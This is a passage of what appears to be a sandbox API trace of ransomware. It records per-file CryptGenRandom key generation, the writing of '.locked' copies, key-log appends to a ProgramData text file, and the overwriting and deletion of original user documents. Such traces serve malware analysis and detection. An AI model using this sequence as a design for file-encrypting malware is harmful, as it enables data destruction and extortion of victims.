lpNumberOfBytesRead=0x12623d68, lpOverlapped=0x0 | out: lpBuffer=0x12a84000*, lpNumberOfBytesRead=0x12623d68*=0x22d3, lpOverlapped=0x0) returned 1 [0295.942] WriteFile (in: hFile=0x230, lpBuffer=0x12a84000*, nNumberOfBytesToWrite=0x22d3, lpNumberOfBytesWritten=0x12623d74, lpOverlapped=0x0 | out: lpBuffer=0x12a84000*, lpNumberOfBytesWritten=0x12623d74*=0x22d3, lpOverlapped=0x0) returned 1 [0296.213] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0296.643] SetEvent (hEvent=0x150) returned 1 [0296.643] SetEvent (hEvent=0x22c) returned 1 [0296.643] ReadFile (in: hFile=0x228, lpBuffer=0x12a84000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x12623d68, lpOverlapped=0x0 | out: lpBuffer=0x12a84000*, lpNumberOfBytesRead=0x12623d68*=0x0, lpOverlapped=0x0) returned 1 [0296.646] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0297.389] CloseHandle (hObject=0x230) returned 1 [0297.391] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0297.623] CloseHandle (hObject=0x228) returned 1 [0297.623] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0298.123] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f4 [0298.204] GetConsoleMode (in: hConsoleHandle=0x1f4, lpMode=0x12623e94 | out: lpMode=0x12623e94) returned 0 [0298.204] WriteFile (in: hFile=0x1f4, lpBuffer=0x1264a180*, nNumberOfBytesToWrite=0x3b, lpNumberOfBytesWritten=0x12623e64, lpOverlapped=0x0 | out: lpBuffer=0x1264a180*, lpNumberOfBytesWritten=0x12623e64*=0x3b, lpOverlapped=0x0) returned 1 [0298.204] CloseHandle (hObject=0x1f4) returned 1 [0298.557] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0299.257] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\Crvhk0MgLr2QKx _m.pdf" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\crvhk0mglr2qkx _m.pdf")) returned 1 [0299.743] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0299.839] SetEvent (hEvent=0x1f0) returned 1 [0299.839] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0299.854] SetEvent (hEvent=0x104) returned 1 [0299.854] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0299.899] SetEvent (hEvent=0x12c) returned 1 [0299.899] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0299.972] SetEvent (hEvent=0x1dc) returned 1 [0299.972] SetEvent (hEvent=0x134) returned 1 [0299.972] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0300.429] SetEvent (hEvent=0x12c) returned 1 [0300.430] SetEvent (hEvent=0x214) returned 1 [0300.430] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0300.437] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0300.445] SetEvent (hEvent=0x134) returned 1 [0300.445] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0300.450] SetEvent (hEvent=0x1f0) returned 1 [0300.450] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0x1) returned 0x0 [0300.471] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0x1) returned 0x102 [0300.491] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0300.491] SetEvent (hEvent=0x1dc) returned 1 [0300.491] SetEvent (hEvent=0x20c) returned 1 [0300.491] SetEvent (hEvent=0x14c) returned 1 [0300.491] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0300.498] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x337efb34, ulCount=0x10, ulNumEntriesRemoved=0x337efb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x337efb34, ulNumEntriesRemoved=0x337efb14) returned 0 [0300.498] SetEvent (hEvent=0x1dc) returned 1 [0300.498] SetEvent (hEvent=0x20c) returned 1 [0300.499] SetEvent (hEvent=0x14c) returned 1 [0300.499] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\Crvhk0MgLr2QKx _m.pdf" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\crvhk0mglr2qkx _m.pdf")) returned 1 [0300.604] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\VupTUE7Pb.xls" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\vuptue7pb.xls"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b0 [0300.674] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0301.531] GetConsoleMode (in: hConsoleHandle=0x1b0, lpMode=0x1249ee88 | out: lpMode=0x1249ee88) returned 0 [0301.531] SetEvent (hEvent=0x134) returned 1 [0301.531] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0302.123] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x125fc040*, nNumberOfCharsToWrite=0xb, lpNumberOfCharsWritten=0x123a1a24, lpReserved=0x0 | out: lpBuffer=0x125fc040*, lpNumberOfCharsWritten=0x123a1a24*=0xb) returned 1 [0302.129] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0302.684] SetEvent (hEvent=0x134) returned 1 [0302.684] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0302.698] SetEvent (hEvent=0x134) returned 1 [0302.699] SetEvent (hEvent=0x198) returned 1 [0302.699] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0302.701] SetEvent (hEvent=0x134) returned 1 [0302.701] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0302.728] SetEvent (hEvent=0x214) returned 1 [0302.728] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0302.917] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\00jJreyg.doc" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\00jjreyg.doc")) returned 1 [0303.038] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\Ifzi1.xlsx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\ifzi1.xlsx")) returned 1 [0303.744] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1234c220*, nNumberOfCharsToWrite=0xb, lpNumberOfCharsWritten=0x12665a24, lpReserved=0x0 | out: lpBuffer=0x1234c220*, lpNumberOfCharsWritten=0x12665a24*=0xb) returned 1 [0303.754] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0303.788] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\AZLma79E0y7Lx7ST0eS\\L-u71CPit811c.xls" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\azlma79e0y7lx7st0es\\l-u71cpit811c.xls"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c8 [0303.789] GetConsoleMode (in: hConsoleHandle=0x1c8, lpMode=0x12665d9c | out: lpMode=0x12665d9c) returned 0 [0303.789] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\AZLma79E0y7Lx7ST0eS\\L-u71CPit811c.xls.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\azlma79e0y7lx7st0es\\l-u71cpit811c.xls.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0303.836] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0304.040] GetConsoleMode (in: hConsoleHandle=0x1a4, lpMode=0x12665d9c | out: lpMode=0x12665d9c) returned 0 [0304.040] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1263e000 | out: pbBuffer=0x1263e000) returned 1 [0304.041] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x12392060 | out: pbBuffer=0x12392060) returned 1 [0304.041] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12702201 | out: pbBuffer=0x12702201) returned 1 [0304.041] WriteFile (in: hFile=0x1a4, lpBuffer=0x12739000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12665d78, lpOverlapped=0x0 | out: lpBuffer=0x12739000*, lpNumberOfBytesWritten=0x12665d78*=0x80, lpOverlapped=0x0) returned 1 [0304.044] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0x1) returned 0x0 [0304.045] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x337efb30, ulCount=0x10, ulNumEntriesRemoved=0x337efb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x337efb30, ulNumEntriesRemoved=0x337efb10) returned 0 [0304.045] SetEvent (hEvent=0x150) returned 1 [0304.045] SetEvent (hEvent=0x198) returned 1 [0304.045] SetEvent (hEvent=0x104) returned 1 [0304.045] SetEvent (hEvent=0x184) returned 1 [0304.045] ReadFile (in: hFile=0x1c8, lpBuffer=0x15694000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x12665d68, lpOverlapped=0x0 | out: lpBuffer=0x15694000*, lpNumberOfBytesRead=0x12665d68*=0x9957, lpOverlapped=0x0) returned 1 [0304.048] WriteFile (in: hFile=0x1a4, lpBuffer=0x15694000*, nNumberOfBytesToWrite=0x9957, lpNumberOfBytesWritten=0x12665d74, lpOverlapped=0x0 | out: lpBuffer=0x15694000*, lpNumberOfBytesWritten=0x12665d74*=0x9957, lpOverlapped=0x0) returned 1 [0304.050] ReadFile (in: hFile=0x1c8, lpBuffer=0x15694000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x12665d68, lpOverlapped=0x0 | out: lpBuffer=0x15694000*, lpNumberOfBytesRead=0x12665d68*=0x0, lpOverlapped=0x0) returned 1 [0304.050] CloseHandle (hObject=0x1a4) returned 1 [0304.056] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0304.208] CloseHandle (hObject=0x1c8) returned 1 [0304.209] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c8 [0304.209] GetConsoleMode (in: hConsoleHandle=0x1c8, lpMode=0x12665e94 | out: lpMode=0x12665e94) returned 0 [0304.209] WriteFile (in: hFile=0x1c8, lpBuffer=0x12352190*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12665e64, lpOverlapped=0x0 | out: lpBuffer=0x12352190*, lpNumberOfBytesWritten=0x12665e64*=0x50, lpOverlapped=0x0) returned 1 [0304.209] CloseHandle (hObject=0x1c8) returned 1 [0304.211] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\AZLma79E0y7Lx7ST0eS\\L-u71CPit811c.xls" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\azlma79e0y7lx7st0es\\l-u71cpit811c.xls")) returned 1 [0304.326] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0304.418] SetEvent (hEvent=0x214) returned 1 [0304.418] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0304.420] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0304.497] SetEvent (hEvent=0x198) returned 1 [0304.497] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0304.518] SetEvent (hEvent=0x1ac) returned 1 [0304.518] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0304.526] SetEvent (hEvent=0x104) returned 1 [0304.526] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0304.529] SetEvent (hEvent=0x1ac) returned 1 [0304.529] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0304.551] SetEvent (hEvent=0x22c) returned 1 [0304.551] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0304.555] SetEvent (hEvent=0x190) returned 1 [0304.555] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0304.617] SetEvent (hEvent=0x1dc) returned 1 [0304.617] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0304.622] SetEvent (hEvent=0x184) returned 1 [0304.622] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0304.659] SetEvent (hEvent=0x198) returned 1 [0304.659] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0305.440] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0305.453] WriteFile (in: hFile=0x1c0, lpBuffer=0x12a7e000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x125dfe78, lpOverlapped=0x0 | out: lpBuffer=0x12a7e000*, lpNumberOfBytesWritten=0x125dfe78*=0xfa000, lpOverlapped=0x0) returned 1 [0305.482] CloseHandle (hObject=0x1c0) returned 1 [0305.550] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\AZLma79E0y7Lx7ST0eS\\GFqXQi80UXX3UPgD.pdf" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\azlma79e0y7lx7st0es\\gfqxqi80uxx3upgd.pdf")) returned 1 [0305.742] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0306.035] SetEvent (hEvent=0x22c) returned 1 [0306.035] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0306.062] SetEvent (hEvent=0x1e8) returned 1 [0306.062] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\ohmbGEEdwmqzwO.xlsx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\ohmbgeedwmqzwo.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c8 [0306.063] GetConsoleMode (in: hConsoleHandle=0x1c8, lpMode=0x124a3d9c | out: lpMode=0x124a3d9c) returned 0 [0306.063] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\ohmbGEEdwmqzwO.xlsx.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\ohmbgeedwmqzwo.xlsx.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0306.063] GetConsoleMode (in: hConsoleHandle=0x208, lpMode=0x124a3d9c | out: lpMode=0x124a3d9c) returned 0 [0306.063] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x125fc140 | out: pbBuffer=0x125fc140) returned 1 [0306.063] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x123920f0 | out: pbBuffer=0x123920f0) returned 1 [0306.063] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12702481 | out: pbBuffer=0x12702481) returned 1 [0306.064] WriteFile (in: hFile=0x208, lpBuffer=0x12653000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12663d78, lpOverlapped=0x0 | out: lpBuffer=0x12653000*, lpNumberOfBytesWritten=0x12663d78*=0x80, lpOverlapped=0x0) returned 1 [0306.065] SetEvent (hEvent=0x20c) returned 1 [0306.065] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0306.236] SetEvent (hEvent=0x1f0) returned 1 [0306.236] SetEvent (hEvent=0x134) returned 1 [0306.237] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0306.254] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0306.317] WriteFile (in: hFile=0x1c0, lpBuffer=0x13e5c000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x1276fe78, lpOverlapped=0x0 | out: lpBuffer=0x13e5c000*, lpNumberOfBytesWritten=0x1276fe78*=0xfa000, lpOverlapped=0x0) returned 1 [0306.338] CloseHandle (hObject=0x1c0) returned 1 [0306.382] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0306.513] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\LbcN3M.odt" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\lbcn3m.odt")) returned 1 [0306.797] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0306.930] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1263e000*, nNumberOfCharsToWrite=0xb, lpNumberOfCharsWritten=0x125e3a24, lpReserved=0x0 | out: lpBuffer=0x1263e000*, lpNumberOfCharsWritten=0x125e3a24*=0xb) returned 1 [0306.940] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0306.989] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0306.991] SetEvent (hEvent=0x1ac) returned 1 [0306.991] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0307.044] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x12390000*, nNumberOfCharsToWrite=0xb, lpNumberOfCharsWritten=0x125e1a24, lpReserved=0x0 | out: lpBuffer=0x12390000*, lpNumberOfCharsWritten=0x125e1a24*=0xb) returned 1 [0307.080] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\nYpw8g8C3.docx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\nypw8g8c3.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x224 [0307.080] GetConsoleMode (in: hConsoleHandle=0x224, lpMode=0x125e1d9c | out: lpMode=0x125e1d9c) returned 0 [0307.080] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\nYpw8g8C3.docx.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\nypw8g8c3.docx.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e0 [0307.081] GetConsoleMode (in: hConsoleHandle=0x1e0, lpMode=0x125e1d9c | out: lpMode=0x125e1d9c) returned 0 [0307.081] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12390020 | out: pbBuffer=0x12390020) returned 1 [0307.081] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x12392040 | out: pbBuffer=0x12392040) returned 1 [0307.081] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1237c081 | out: pbBuffer=0x1237c081) returned 1 [0307.081] WriteFile (in: hFile=0x1e0, lpBuffer=0x124a7000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x125e1d78, lpOverlapped=0x0 | out: lpBuffer=0x124a7000*, lpNumberOfBytesWritten=0x125e1d78*=0x80, lpOverlapped=0x0) returned 1 [0307.084] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0x1) returned 0x0 [0307.086] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x337efb30, ulCount=0x10, ulNumEntriesRemoved=0x337efb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x337efb30, ulNumEntriesRemoved=0x337efb10) returned 0 [0307.086] SetEvent (hEvent=0x150) returned 1 [0307.086] SetEvent (hEvent=0x1e8) returned 1 [0307.086] SetEvent (hEvent=0x14c) returned 1 [0307.086] SetEvent (hEvent=0x22c) returned 1 [0307.086] ReadFile (in: hFile=0x224, lpBuffer=0x13858000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x125e1d68, lpOverlapped=0x0 | out: lpBuffer=0x13858000*, lpNumberOfBytesRead=0x125e1d68*=0x7bd0, lpOverlapped=0x0) returned 1 [0307.089] WriteFile (in: hFile=0x1e0, lpBuffer=0x13858000*, nNumberOfBytesToWrite=0x7bd0, lpNumberOfBytesWritten=0x125e1d74, lpOverlapped=0x0 | out: lpBuffer=0x13858000*, lpNumberOfBytesWritten=0x125e1d74*=0x7bd0, lpOverlapped=0x0) returned 1 [0307.094] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0307.108] SetEvent (hEvent=0x12c) returned 1 [0307.108] ReadFile (in: hFile=0x224, lpBuffer=0x13858000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x125e1d68, lpOverlapped=0x0 | out: lpBuffer=0x13858000*, lpNumberOfBytesRead=0x125e1d68*=0x0, lpOverlapped=0x0) returned 1 [0307.108] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0307.370] CloseHandle (hObject=0x1e0) returned 1 [0307.425] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0307.713] CloseHandle (hObject=0x224) returned 1 [0307.713] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x224 [0307.713] GetConsoleMode (in: hConsoleHandle=0x224, lpMode=0x125e1e94 | out: lpMode=0x125e1e94) returned 0 [0307.713] WriteFile (in: hFile=0x224, lpBuffer=0x12380240*, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x125e1e64, lpOverlapped=0x0 | out: lpBuffer=0x12380240*, lpNumberOfBytesWritten=0x125e1e64*=0x34, lpOverlapped=0x0) returned 1 [0307.714] CloseHandle (hObject=0x224) returned 1 [0307.717] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\nYpw8g8C3.docx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\nypw8g8c3.docx")) returned 1 [0307.853] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0308.236] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\nYpw8g8C3.docx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\nypw8g8c3.docx"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x230 [0308.373] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0308.552] GetConsoleMode (in: hConsoleHandle=0x230, lpMode=0x125e1e88 | out: lpMode=0x125e1e88) returned 0 [0308.552] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0308.737] WriteFile (in: hFile=0x230, lpBuffer=0x17cdc000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x125e1e78, lpOverlapped=0x0 | out: lpBuffer=0x17cdc000*, lpNumberOfBytesWritten=0x125e1e78*=0xfa000, lpOverlapped=0x0) returned 1 [0309.129] CloseHandle (hObject=0x230) returned 1 [0309.362] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\nYpw8g8C3.docx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\nypw8g8c3.docx")) returned 1 [0309.426] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0309.516] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0309.527] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0309.539] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0309.540] SetEvent (hEvent=0x1e8) returned 1 [0309.540] SetEvent (hEvent=0x20c) returned 1 [0309.540] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0309.560] SetEvent (hEvent=0x104) returned 1 [0309.561] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12390000 | out: pbBuffer=0x12390000) returned 1 [0309.561] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x12392010 | out: pbBuffer=0x12392010) returned 1 [0309.561] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12714001 | out: pbBuffer=0x12714001) returned 1 [0309.562] WriteFile (in: hFile=0x1a4, lpBuffer=0x126fb000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x123a3d78, lpOverlapped=0x0 | out: lpBuffer=0x126fb000*, lpNumberOfBytesWritten=0x123a3d78*=0x80, lpOverlapped=0x0) returned 1 [0309.565] ReadFile (in: hFile=0x1bc, lpBuffer=0x13cf8000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x123a3d68, lpOverlapped=0x0 | out: lpBuffer=0x13cf8000*, lpNumberOfBytesRead=0x123a3d68*=0x107d4, lpOverlapped=0x0) returned 1 [0309.567] WriteFile (in: hFile=0x1a4, lpBuffer=0x13cf8000*, nNumberOfBytesToWrite=0x107d4, lpNumberOfBytesWritten=0x123a3d74, lpOverlapped=0x0 | out: lpBuffer=0x13cf8000*, lpNumberOfBytesWritten=0x123a3d74*=0x107d4, lpOverlapped=0x0) returned 1 [0309.617] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0309.642] SetEvent (hEvent=0x150) returned 1 [0309.642] SetEvent (hEvent=0x104) returned 1 [0309.642] ReadFile (in: hFile=0x1bc, lpBuffer=0x13cf8000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x123a3d68, lpOverlapped=0x0 | out: lpBuffer=0x13cf8000*, lpNumberOfBytesRead=0x123a3d68*=0x0, lpOverlapped=0x0) returned 1 [0309.642] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0310.155] SetEvent (hEvent=0x220) returned 1 [0310.155] CloseHandle (hObject=0x1a4) returned 1 [0310.156] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0310.514] CloseHandle (hObject=0x1bc) returned 1 [0310.514] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0310.515] GetConsoleMode (in: hConsoleHandle=0x1bc, lpMode=0x123a3e94 | out: lpMode=0x123a3e94) returned 0 [0310.515] WriteFile (in: hFile=0x1bc, lpBuffer=0x125740a0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x123a3e64, lpOverlapped=0x0 | out: lpBuffer=0x125740a0*, lpNumberOfBytesWritten=0x123a3e64*=0x4b, lpOverlapped=0x0) returned 1 [0310.515] CloseHandle (hObject=0x1bc) returned 1 [0310.515] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\KcRwHRb9GRYnTCwA\\Cg4wICSJ7X32.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\jbo1fzx\\kcrwhrb9gryntcwa\\cg4wicsj7x32.mp3")) returned 1 [0310.631] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0310.732] 